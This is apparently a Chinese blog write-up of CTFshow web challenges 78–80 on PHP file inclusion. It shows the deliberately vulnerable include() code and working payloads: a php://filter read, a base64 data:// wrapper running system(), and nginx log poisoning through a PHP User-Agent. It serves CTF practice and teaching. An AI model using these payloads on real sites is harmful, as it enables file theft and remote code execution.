CTFshow-web-vip 78-81 基础文件包含

28.7的博客2025-11-282025-11-28

CTFshow web 78 - 基础代码

起步代码

这部分代码可任意用作实验

payload: ?file=php://filter/convert.base64-encode/resource=flag.php

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

CTFshow web 79 - 过滤php

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

CTFshow web 80 - 过滤php以及data

本题目使用ua注入，先包含日志文件，然后写入木马，因为nginx 默认会将ua写入日志，通过文件包含也就达到马的效果

172.12.234.244 - - [28/Nov/2025:12:53:39 +0000] "GET / HTTP/1.1" 200 2291 "https://5810ad1d-fb58-4ac5-9db3-146929e85826.challenge.ctf.show/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0"

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

GET /?file=/var/log/nginx/access.log HTTP/1.1
Host: 5810ad1d-fb58-4ac5-9db3-146929e85826.challenge.ctf.show
User-Agent: <?php system('cat fl0g.php');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i